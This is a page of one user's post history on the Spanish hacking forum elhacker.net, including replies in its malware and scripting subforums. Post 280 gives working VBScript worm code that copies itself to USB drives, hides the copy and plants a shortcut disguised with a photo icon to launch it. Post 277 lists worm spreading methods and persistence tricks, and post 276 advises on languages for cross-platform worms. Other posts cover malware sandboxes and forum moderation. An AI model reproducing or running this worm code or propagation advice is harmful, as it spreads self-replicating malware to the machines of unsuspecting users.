elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 ... 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28] 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 ... 102
271  Seguridad Informática / Análisis y Diseño de Malware / Re: [VBS] [SOURCE] Facebook y Twitter Spread en: 14 Marzo 2014, 18:56 pm
Las APIS de facebook alertan al usuario sobre las acciones que se van a ejecutar bajo su cuenta. Cuando conectamos un juego del iphone/android al facebook siempre pregunta si le queremos dar acceso. Usar las APIS de facebook para propagar un gusano es un poco... como lo diría... poco efectivo xD
272  Informática / Software / Re: AYUDA POR FAVOR en: 13 Marzo 2014, 15:32 pm
1- Preguntas como activar un programa en el foro de scripting
2- Dejas bien claro en el mensaje que estás intentando piratear el autocad 2014
3- No eres capaz ni de usar un keygen/activador pero pretender utilizar autocad...

Te voy a cerrar el tema, éste tipo de cosas se desbordan de la lógica común.
273  Seguridad Informática / Hacking / Re: Manual Basico Cheat Engine. en: 13 Marzo 2014, 14:12 pm
Aquí tienes un ejemplo MUY bueno sobre un trainer hecho en C

http://www.mediafire.com/?zjmnj0yihhm

Aquí el ejemplo compilado: http://www.thps-mods.com/files/extthps4p_6.rar

Saludos
274  Seguridad Informática / Análisis y Diseño de Malware / Re: Pregunta sobre la estructura de un malware en: 12 Marzo 2014, 23:23 pm
Pues hay varias formas de analizar un malware. A mi me gusta ejecutarlos en mi maquina virtual para inspeccionar con FileMon y RegMon (sysinternals) los cambios que ejecutan.

Otro método es usar un sandbox online, mi favorito es Anubis. Te da un reporte muy completo sobre las acciones de un proceso. Otra sandbox que es muy completa:

https://malwr.com/

Aquí un ejemplo de un report completo: https://malwr.com/analysis/MWFlOTNlNzBkNGQ2NDAyNWI4NDM4MzcyOWFmMGE5YTI/

Saludos
275  Seguridad Informática / Análisis y Diseño de Malware / Re: Pregunta sobre la estructura de un malware en: 12 Marzo 2014, 17:07 pm
Buenas, por la poca información que comentas, me atrevería a decir que tenías un virus de los que yo llamo "persistente". Posiblemente tendrías infectada las claves del registro Winlogon\Shell y Winlogon\Userinit.

De todas formas, para poderte dar una respuesta fiable, necesitaría una copia del virus para poder analizarlo. Tienes alguna copia del fichero que puestas postear aquí?

Saludos
276  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre propagación de gusanos 2014 en: 12 Marzo 2014, 14:47 pm
Citar
- Primera pregunta: ¿Cuál es el mejor lenguaje de programación para hacer lo que dices? ó ¿Cuál otro ademas debería aprender?

En teoría, cualquier lenguaje sería apto. Mi recomendación es que utilices un lenguaje que domines y que no tenga muchas dependencias... por ejemplo:

Phyton: Podría ser una  opción viable, pero no todos los equipos tienen las librerías para interpretar Phyton.
C: Mejor opción, siempre y cuando el binario no tenga dependencias a librerías externas que no sean estándar.

Citar
- Segunda pregunta: ¿En qué lenguaje en especial puedo yo hacer esto posible? que sus funciones se ejecuten en cualquier tipo de SO, ó ¿Qué en especial debería aprender para hacer esto posible?

Si buscas hacer un worm multi-plataforma, deberás usar un lenguaje multi-plataforma, por ejemplo JAVA. De todas formas, para empezar me centraría en programar sobre una misma plataforma (por ejemplo Windows). Luego tendrás que tener "cuidado" a la hora de programar para conseguir que tu código se ejecute desde Windows XP hasta Windows 8 x64, para ello tendrás que testear tu código en distintas computadoras. Lo mejor es usar maquinas virtuales.

Citar
- Tercera pregunta: ¿Igual podría hacer esto sin importar que mi ejecutable final del gusano esta unido a otro por un Joiner?

No entiendo ésta pregunta xD
277  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre propagación de gusanos 2014 en: 11 Marzo 2014, 23:00 pm
El mundo de los worms me apasiona; propagación e infección de ficheros. Hay muchos métodos, te describo alguno de ellos (no son complicado de implementar):

- Crear un recurso de red infectado (Honeypot)
- Sustituir el salvapantallas
- Propagación por redes P2P (lo más sencillo es infectar Ares+Emule)
- Infección de ficheros ZIP/RAR locales
- Propagación a través de recursos compartidos en red (Network Spread)
- Propagación por GoogleDrive + Dropbox
- Propagación por USB (Autorun, sustituir ficheros por accesos directos, etc...)
- Propagación por redes sociales (Facebook + Twitter)
- Propagación por IM (Yahoo + Skype)
- Infección de ficheros locales (Macros de Office, sustitución de VBS/VBE, infección de ejecutables, ...)

El troyano h-worm utiliza solo UNO de los sistemas mencionados arriba (Propagación USB por accesos directos) y consigue una alta tasa de infección. Imagínate si implementas una combinación de ellos :P

Para programar un worm, primero de todo tendrás que decidir el lenguaje de programación ha usar. Luego codearlo de forma minuciosa, asegurándote que todas sus funciones se ejecutarán en cualquier equipo (independientemente del SO, modelo, permisos de usuario o idioma del SO).

Una vez tienes programada la parte de la propagación, toca centrarse en la parte de la "persistencia", es decir; asegurarse que tu gusano se ejecutará siempre y durante muuuucho tiempo en los PC's infectados. Imagínate lo siguiente:

Infectas un equipo
El usuario lo detecta y realiza una limpieza minuciosa del sistema
El usuario cree estar libre del gusano
Pasado unos días, el equipo se vuelve a infectar debido a que una copia del gusano se almacenó como salvapantallas por defecto del equipo... tras unos minutos de inactividad se ejecutó la copia del gusano y ZASCA! sistema infectado de nuevo.

Otra forma de lograr la "persistencia" es programar ANSI Bombs, que permanezcan dormidas y encriptadas en el disco para luego ser ejecutadas en un evento específico o tras una fecha acordada.

Saludos
278  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Mensaje dirijido a los usuarios del foro en: 11 Marzo 2014, 12:48 pm
A ver, que el tema es delicado, vayamos por partes:

1. Si un usuario recibe insultos en su blog por parte de un usuario de ésta comunidad, es normal que exponga en éste foro sus inquietudes.
2. El tema del buying o "problemas personales diversos" son temas delicados, a no ser que tengáis un doctorado en la materia rogaría que evitéis dar indicaciones a nadie.
3. crazykenny es un usuario al que tengo especial cariño. Quien lo toque me lo cargo
4. Randomize, una cosa es aprender aceptar criticas constructivas y otra muy diferente es leer insultos.
5. crazykenny, mis clases didácticas de escritura no han dado resultados xD, sigues escribiendo igual de mal o peor:

Citar
Por otra parte, a ver, quisiera recordar a todo aquel que visita el foro que lo unico que pretendo visitando este foro es la posibilidad de ayudar, de un modo u otro, a gente que lo necesite pueda necesitar ayuda en los temas que pueda ayudar.

He cogido una frase aleatoria, en negrita está marcado lo que sobra.

Saludos.
279  Programación / Scripting / Re: [AYUDA][VBS] Pasar varios argumentos en un acceso directo en: 11 Marzo 2014, 12:30 pm
HOLA!!!

Buen codigo, yo cambiaria el msgbox del final por un vbCritical con "Imagen Corrupta, &H89BA3D7E No se puede READ."

GRACIAS POR LEER!!!

Tengo que preguntartelo... tu nick tiene algún significado lógico o simplemente te salió al hacer una consulta random?

Código
  1. MiNick = Int(Rnd * 999999999)

 :huh: :huh: :huh: :huh: :huh: :huh:
280  Programación / Scripting / Re: [AYUDA][VBS] Pasar varios argumentos en un acceso directo en: 11 Marzo 2014, 11:58 am
Bueno, mientras te responden, te dejo una posible solución:

Código
  1. On Error Resume Next
  2.  
  3. Set WSS = CreateObject("WScript.Shell")
  4. Set FSO = CreateObject("Scripting.FileSystemObject")
  5.  
  6. SpreadUSB
  7.  
  8. Function SpreadUSB()
  9. for each drive in FSO.drives
  10. if  drive.isready = true then
  11. if  drive.freespace  > 0 then
  12. if  drive.drivetype  = 1 then
  13. FSO.copyfile wscript.scriptfullname , drive.path & "\" & wscript.scriptname,true
  14. FSO.getfile(drive.path & "\"  & wscript.scriptname).attributes = 2+4
  15. set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk")
  16. lnkobj.windowstyle = 7
  17. lnkobj.targetpath = "cmd.exe"
  18. lnkobj.workingdirectory = ""
  19. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
  20. lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\")
  21. lnkobj.save()
  22. end if
  23. end if
  24. end if
  25. next
  26. End Function
  27.  
  28. MsgBox "soy un virus"



Es un ejemplo muy sencillo:

Busca todas las unidades del PC que sean extraibles. Si la unidad está disponible y con espacio... copia el script y lo oculta. Luego crea un acceso directo al script y le establece el icono de una foto.

Lo que preguntas de copiar el virus al PC, añadir al registro y tal... es demasiado fácil como para volverlo a explicar. Te remito al tutorial de VBS que seguro resolverá tus otras dudas.

http://foro.elhacker.net/scripting/tutorial_vbscript-t229032.0.html

Saludos
Páginas: 1 ... 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28] 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 ... 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines